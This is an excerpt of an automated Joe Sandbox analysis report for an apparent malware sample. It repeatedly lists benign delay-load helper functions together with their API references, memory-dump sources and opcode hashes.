                                        • Instruction Fuzzy Hash: 1BB0128127C0026C364876143D02D37010CC0C6B51330C61FF804C1681D4C04D760431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 46c22965d2638a8bde0ca6457880262729d0771d08fd5715943fabbb4018ee3c
                                        • Instruction ID: 89edbef68786dc7b791bef3fe491623c1dbd9a53fe87c0737b040f3366405e00
                                        • Opcode Fuzzy Hash: 46c22965d2638a8bde0ca6457880262729d0771d08fd5715943fabbb4018ee3c
                                        • Instruction Fuzzy Hash: AEB0128127C0016C364872153E02D37010CC0C5B51330861EF804C1681D4C14E7B1431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9c71618178eb7d5c821070ef030897303414b1acf1865e7447d82b00ab6a794d
                                        • Instruction ID: 2b5cb6e6feee502f3ef19854006731d744b452dbe91f581a9fd718a344b7078b
                                        • Opcode Fuzzy Hash: 9c71618178eb7d5c821070ef030897303414b1acf1865e7447d82b00ab6a794d
                                        • Instruction Fuzzy Hash: 8BB0128527C2016C3B4472153D02D37011CC0C5B51330471EF404C1681D4C04DB20431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ed434a23c49028f06afe450a7738cd495b6bf175d32fed4062a5c744afb74af9
                                        • Instruction ID: 062a61dfbeaf5cd12cf644769df0920817dcaebf8031936f978598b1e4eed5c5
                                        • Opcode Fuzzy Hash: ed434a23c49028f06afe450a7738cd495b6bf175d32fed4062a5c744afb74af9
                                        • Instruction Fuzzy Hash: B9B012C527C1016C360472143D02D37010CC0C5B51330461EF404C1681D4C04D720531
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 1cfbc110237affb76c0e2b687b557ca6e769deb96749004143afd4e70d35b0ad
                                        • Instruction ID: dcb5ba21d119e0c7f2b0adf7def03c67c79ce14cdcb4ff8e39f422430bae696e
                                        • Opcode Fuzzy Hash: 1cfbc110237affb76c0e2b687b557ca6e769deb96749004143afd4e70d35b0ad
                                        • Instruction Fuzzy Hash: 0DB0128527C2016C360472153E02D37010CC0C5B51330461EF804C1681D4C14F730431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 10f5d08cbe0feffe0ed9385334f2dc0d8ca2b88eb8c49b48b985425e551b4f89
                                        • Instruction ID: b1a22a7a204322a34bcf02ac41b1fb77bdd4a8454051ba5ad32e0c5524479e66
                                        • Opcode Fuzzy Hash: 10f5d08cbe0feffe0ed9385334f2dc0d8ca2b88eb8c49b48b985425e551b4f89
                                        • Instruction Fuzzy Hash: A8B0129127C0016C360472153E02E37010CC0C5B51330462EF804C1581D4C14F730431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 546b6e215957a247843d6c4d04a2df0df31c57b75130b5f7036a2b76335bc638
                                        • Instruction ID: 9a0512b1f1841ffe318b176dfa7de766e8e2bfc1c77224abf586f914161f9331
                                        • Opcode Fuzzy Hash: 546b6e215957a247843d6c4d04a2df0df31c57b75130b5f7036a2b76335bc638
                                        • Instruction Fuzzy Hash: 47B012812BD0016C3A0472143D02D37010DC0C6B51330861EF808C15C1D4C04D720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ffc00b4469fbb5e1aa4374d5746809f2c13128937eb7d1484cf32338a9af3447
                                        • Instruction ID: de5ef3b3e3b666bb543ff00546243a3380aa5dc2f28607707cedeba8f4319504
                                        • Opcode Fuzzy Hash: ffc00b4469fbb5e1aa4374d5746809f2c13128937eb7d1484cf32338a9af3447
                                        • Instruction Fuzzy Hash: D6B0129227C0016C360472143D02E37010CC0C6B51330862EF804C1581D4C04E720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: c0ee3ddc9db8f3443d35e213b7ced1b27cc52ed64995ff1d67461580c5a292c0
                                        • Instruction ID: 78052c5bf4e8f77704c0e6a49162cc708c7ed21f76d40f1d9890991e058c57d7
                                        • Opcode Fuzzy Hash: c0ee3ddc9db8f3443d35e213b7ced1b27cc52ed64995ff1d67461580c5a292c0
                                        • Instruction Fuzzy Hash: 5FB0128127C0016C364872643D02D37010CC0C5B513308A1EF405C1681D4C04D760431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9f68d349de5b2ea9677804ddb80ebd0d28f548b2bd0bf1db1f55447399e3ec1a
                                        • Instruction ID: aa80478e8112b470736cc0e2120a20f06a3743fb96d99f5ea08399578e745c0d
                                        • Opcode Fuzzy Hash: 9f68d349de5b2ea9677804ddb80ebd0d28f548b2bd0bf1db1f55447399e3ec1a
                                        • Instruction Fuzzy Hash: FAB0129127C1016C374472153D02E37010CC0C5B51330472EF404C1581D4C04EB20431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: d78e02f0e22e0545c0314c3594b5223d272c8bec8814ac33b0fdf1b01c14b956
                                        • Instruction ID: 930be10ca2763813048e368f20d5f4476614f26c04d3b98e10754be20287050f
                                        • Opcode Fuzzy Hash: d78e02f0e22e0545c0314c3594b5223d272c8bec8814ac33b0fdf1b01c14b956
                                        • Instruction Fuzzy Hash: 78B0129127D1016C3B4473153D02D37010DC0C5B51330471EF408C1581D4C08DB20431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 42c8f1f133486789da1cb18526bc7b9c733d934468c4d01b91af9baca5d50d05
                                        • Instruction ID: f40f824524deb4a098748cbc57be0a8a5eea9cec14d6fe3c973ee530d214b24e
                                        • Opcode Fuzzy Hash: 42c8f1f133486789da1cb18526bc7b9c733d934468c4d01b91af9baca5d50d05
                                        • Instruction Fuzzy Hash: 71B0128127D0016C3A0472143D02D37014EC4C5B51330461EF408C1581D4C04D720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 71cf6c7584e33da02226cbfb4cc0166f14121c906bc6da98ba282483f3f36d5b
                                        • Instruction ID: 6cba7a358e65a97e109f5d4eefa3ef5e0f3e77df63bece3252f5a411c228a84b
                                        • Opcode Fuzzy Hash: 71cf6c7584e33da02226cbfb4cc0166f14121c906bc6da98ba282483f3f36d5b
                                        • Instruction Fuzzy Hash: 89B0128127C0016D360472143D03D37010CC0C6B513308A1EF804C5581D4C04D720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 434a4aaba839316d86ab4c9bfecfab80066f2833490fd19f90ed1603544b5637
                                        • Instruction ID: 831969153c4b4d0926c66abdd6440118523ac784988585146646cfde49227682
                                        • Opcode Fuzzy Hash: 434a4aaba839316d86ab4c9bfecfab80066f2833490fd19f90ed1603544b5637
                                        • Instruction Fuzzy Hash: 1CB0128127D0026C350471095E03E37010CC4C1B15330932EF500C1181D4804C730631
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 6b8e599a780efac5387b4654aaff1a1677c67f5a205faa018663991b64dea109
                                        • Instruction ID: 9d1928fa8b033081d5606d4ed190f79c19ef2cfdec52d8014691eb4326b919fc
                                        • Opcode Fuzzy Hash: 6b8e599a780efac5387b4654aaff1a1677c67f5a205faa018663991b64dea109
                                        • Instruction Fuzzy Hash: 2FB0128127D1026C3604710A5D03E37010CC4C1B15330532EF400C11C1D4804CB60631
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 4804329e21ee367818308041c780ac36537e097811e32bc769bbb7b1156a30ad
                                        • Instruction ID: 6bf9025c591cd00cde54453a42f3506d897e21a2ace76ae0e453b528e0b34e87
                                        • Opcode Fuzzy Hash: 4804329e21ee367818308041c780ac36537e097811e32bc769bbb7b1156a30ad
                                        • Instruction Fuzzy Hash: DEB0128127D112AC350471091D13E37010CC4C1B15330922EFC00C1281D4805C720631
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ba51bf44d974ea46f30930becbe0e0594a3a7471ffa7ecded64ae5553de4d5b4
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: ba51bf44d974ea46f30930becbe0e0594a3a7471ffa7ecded64ae5553de4d5b4
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: fb6e887399a3af38256422228720a8f95b955ca602d149965aa155c7bb32ea89
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: fb6e887399a3af38256422228720a8f95b955ca602d149965aa155c7bb32ea89
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
